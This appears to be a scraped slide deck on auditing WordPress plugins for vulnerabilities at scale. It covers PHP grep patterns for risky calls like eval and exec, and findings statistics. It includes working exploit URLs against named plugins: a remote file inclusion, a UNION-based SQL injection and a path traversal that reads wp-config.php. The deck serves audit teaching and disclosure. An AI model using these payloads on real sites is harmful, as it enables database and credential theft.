large-scale application security
DESCRIPTION
Large-scale application security. Charlie Eriksen. Agenda. Define the problem space Testing and auditing techniques Step 1 – Define target Step 2 – Understand the target Step 3 – Find critical/high-risk code paths to review Step 4 – Review and test - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/1.jpg)
Large-scale application securityCharlie Eriksen
![Page 2: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/2.jpg)
![Page 3: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/3.jpg)
![Page 4: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/4.jpg)
![Page 5: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/5.jpg)
![Page 6: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/6.jpg)
Agenda•Define the problem space•Testing and auditing techniques•Step 1 – Define target•Step 2 – Understand the target•Step 3 – Find critical/high-risk code paths to review•Step 4 – Review and test•Step 5 – Asses your findings and iterate•Future challenges
▫Locating the absence of CSRF protection▫Real-time alerting
![Page 7: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/7.jpg)
Goals•The ability to take a large amount of code
and audit it for vulnerabilities•Prioritize time spent in an audit based on
risk•Spend as little time as possible to find as
many vulnerabilities as possible
![Page 8: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/8.jpg)
Inspiration
![Page 9: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/9.jpg)
Inspiration
![Page 10: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/10.jpg)
Inspiration
![Page 11: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/11.jpg)
Problem space•Large amounts of large code bases exist•Reviewing in depth is cost prohibitive
▫… and is going to take all of your life▫… and you’ll still miss half the
vulnerabilities•What is the cost per vulnerability found?•What vulnerabilities have the higher risk?
▫Risk($) =
![Page 12: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/12.jpg)
Vulnerability classes and mitigation
Systematic vulnerabilities• Framework• Code review• Manual/Automatic
testing
Business/design logic• Code review• Manual testing
![Page 13: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/13.jpg)
What we’re not trying to solve•Reviewing business logic•Pin-point accuracy of vulnerabilities•(Not really) reviewing for the absence
of…▫We’ll look at my attempt at reviewing for
the absence of CSRF protection later!
![Page 14: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/14.jpg)
Testing techniques
White box
Black box
The sweet spot
![Page 15: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/15.jpg)
White box Black box• Pros
▫ Not restricted by your discovery phase
▫ Gets you straight to where interesting things happen
• Cons▫ Some code can be too
hard to statically analyze▫ Things may hide in plain
sight
• Pros▫ Some parts can be
automated▫ Allows you to observe
behavior▫ Will uncover the most
obvious flaws• Cons
▫ Uncovering some bugs can be expensive
▫ Special code-paths may never be executed
![Page 16: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/16.jpg)
Testing techniques
![Page 17: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/17.jpg)
Audit ROI• This is probably true for most companies
▫Large number of applications▫Lots of legacy▫Not enough time to audit all thoroughly
• Consider:▫What do you not know/Are there risks you’re not
aware of?▫What is your vulnerability tolerance?▫What vulnerabilities have the highest impact?▫What vulnerabilities are most likely to be
discovered?
![Page 18: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/18.jpg)
Audit ROI
Discoverability
Impact
HardEasy
High
Low
$$$
Good!
Are you google? If not, wasted time/money
![Page 19: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/19.jpg)
![Page 20: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/20.jpg)
Candidate point strategy•Fastest way to identify a lot of
vulnerabilities•Starts with identifying:
▫Points with side effects▫Known vulnerable patterns
•Then back-tracing
![Page 21: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/21.jpg)
![Page 22: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/22.jpg)
Step 1 – Define target•Find a target
▫In-house?▫Public projects?
Plugins!•Obtain source code
![Page 23: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/23.jpg)
Wordpress example
![Page 24: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/24.jpg)
Step 2 - Understand the target•Learn the language•Internalize OWASP top 10•Observe the framework and language
▫Dangerous functions▫Mitigation techniques
•Find commonly vulnerable code patterns
![Page 25: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/25.jpg)
PHP/Wordpress important functions•A good list exists here for PHP: http://
stackoverflow.com/questions/3115559/exploitable-php-functions
•Highlights:▫include/require▫system/exec/shell_exec▫eval
•Wordpress specific:▫wpdb
![Page 26: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/26.jpg)
Step 3 – Find critical/high-risk code paths to review• Higher risk code paths is where you’ll want to
spend more time• Determine your critical functionality and assets• Examples might be:
▫System calls▫Database access▫File system access▫Web-specific things, forms, markup output▫Encoding(base64)▫Cryptographic usage(md5!?)
• These will be our candidate points
![Page 27: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/27.jpg)
Good PHP regexes•(include|require).*\$_(POST|GET|REQUEST)•file_get_contents.*\$_(POST|GET|REQUEST)•(eval|exec|system|shell_exec).*\$_(POST|GET|
REQUEST)•SELECT .* FROM .* \$_(POST|GET|REQUEST)•(echo|print).*\$_(POST|GET|REQUEST)
![Page 28: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/28.jpg)
![Page 29: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/29.jpg)
Step 4 – Review and test•Start by casting the net wide on a project•As you learn more about it, start being
more specific and reduce noise•Learn to review code at a glance•High risk vulnerabilities are usually easily
seen at a glance
![Page 30: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/30.jpg)
![Page 31: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/31.jpg)
![Page 32: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/32.jpg)
Example 1
![Page 33: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/33.jpg)
Example 1 – Cryptographic md5\s?\(.*\$_(GET|POST|REQUEST)
![Page 34: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/34.jpg)
![Page 35: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/35.jpg)
Example 1 – Cryptographic exploit
![Page 36: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/36.jpg)
Example 2
![Page 37: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/37.jpg)
Example 2 – File inclusion (include|require).*\$_(POST|GET|REQUEST)
![Page 38: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/38.jpg)
![Page 39: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/39.jpg)
Example 2 – File inclusion
/wordpress/wp-content/plugins/zingiri-web-shop/fws/download.php?abspath=ftp://hello:[email protected]/
![Page 40: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/40.jpg)
Example 3
![Page 41: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/41.jpg)
Example 3 – SQL Injection
SELECT .* FROM .* \$_(POST|GET|REQUEST)
![Page 42: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/42.jpg)
![Page 43: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/43.jpg)
Example 3 – SQL Injection
/wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=2 UNION SELECT 1, 2, user(), @@version, 5, 6, 7, 8, 9, 10, database(), 12, 13, 14, 15, 16, 17, 18
![Page 44: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/44.jpg)
Example 4
![Page 45: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/45.jpg)
Example 4 – File disclosurefile_get_contents.*\$_(POST|GET|REQUEST)
![Page 46: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/46.jpg)
![Page 47: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/47.jpg)
Example 4 – File disclosure
/wordpress/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
![Page 48: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/48.jpg)
Step 5 – Asses your findings and iterate• Steps to take
▫Assess risk▫Do root cause analysis▫Consider if there is likely to be more vulnerabilities of
this type▫Find out if there are steps that can be taken to
mitigate the class of vulnerability at large• Find next steps to improve your ROI
▫Are you coming close to your risk tolerance? ▫Are there still unknowns?▫Are there other higher-risk areas(ROI?)▫Have you addressed the most discoverable bugs?
![Page 49: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/49.jpg)
Methodology•All vulnerabilities found using this method•All vulnerabilities submitted to Secunia
SVCRP▫Sweet program, check it out
•Data based on their advisories▫Download numbers pulled manually
![Page 50: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/50.jpg)
Research findings•24 plugins•~2 million downloads•66 vulnerabilities
![Page 51: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/51.jpg)
Downloads
GD Star RatingGoogle Document Embedder
Quotes CollectionDuplicator
Crayon Syntax HighlighterWP Symposium
TheCartPressZingiri Web ShopWP Online Store
Sendit NewsletterZingiri ForumProfile Builder
Flexi Quote RotatorA page flip bookAll video Gallery
Floating Social Media LinksFireStorm Professional..
Paid Memberships ProCimy User Manager
Mac Photo GalleryNmedia Mailchimp
UngalleryGlobal Content Blocks
0 200,000 400,000 600,000 800,000 1,000,000
![Page 52: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/52.jpg)
VulnerabilitiesSecurity bypass; 11
File inclusion; 6
File disclosure; 5
SQL injection; 25
XSS; 18
Command execution; 1
![Page 53: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/53.jpg)
Time to patch
Series10 20 40 60 80 100 120 140
6 advisories without patch34 days to patch on average
![Page 54: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/54.jpg)
Future challenges – Locate the absence of mitigation •Simple question: How do you accurately
pin-point for the absence of a vulnerability mitigation?
•Secure by default helps, but can’t be assumed
![Page 55: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/55.jpg)
Locating the absence of CSRF protection
![Page 56: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/56.jpg)
Results•30 plugins•14.000.000 downloads
![Page 57: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/57.jpg)
Plugin downloads 455k downloads on average
![Page 58: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/58.jpg)
Future challenges – Vulnerability alerting•We know how to look for vulnerabilities•You have to keep up with current
development•Reviewing the same code over and over
again stops paying off•How do we make a machine look for
things to review in real-ish time?
![Page 59: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/59.jpg)
Conclusions• Intelligent grep use can uncover vulnerabilities• Using your understanding of a language and
framework serves as a great starting point for code reviews
• By reviewing critical code-paths for mechanical vulnerabilities, you can cover a lot of ground in short time
• Systematic vulnerabilities exist and can be uncovered en masse quite trivially
• Use root cause analysis appropriately and fix the problem rather than the symptom
![Page 60: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/60.jpg)
Bonus example!
![Page 61: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/61.jpg)
Bonus example!array_merge\(.*\$_(POST|GET|REQUEST)
![Page 62: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/62.jpg)